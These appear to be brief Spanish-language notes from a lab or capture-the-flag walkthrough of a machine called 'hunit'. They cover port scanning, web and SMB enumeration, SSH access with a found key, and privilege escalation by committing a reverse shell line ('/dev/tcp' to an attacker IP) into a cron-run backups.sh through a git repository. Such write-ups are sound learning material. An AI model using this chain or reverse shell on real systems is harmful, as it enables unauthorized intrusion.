nmap -A -p- -oA hunit 192.168.123.125 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA hunit 192.168.123.125
nmap -sU -O -p- -oA hunit-udp 192.168.123.125
nikto -h 192.168.123.125:80
Cuando le damos click a uno de los links podemos ver un comentario como el de abajo.
curl http://192.168.123.125:8080/api/
curl http://192.168.123.125:8080/api/user
smbclient -L 192.168.123.125 -p 12445
ssh dademola@192.168.123.125 -p 43022
Con linpeas.sh conseguimos lo siguiente:
Vemos que esto es un backup
Vemos que git es otro usuario regular
git clone file:////git-server
cd home/git
ssh -i id_rsa git@192.168.123.125 -p 43022
cd git-server
vim backups.sh
chmod +x backups.sh
echo "sh -i >& /dev/tcp/192.168.49.123/8080 0>&1" >> backups.sh
git add .
git commit -m "reverse"
GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git push origin master
nc -lvnp 8080
whoami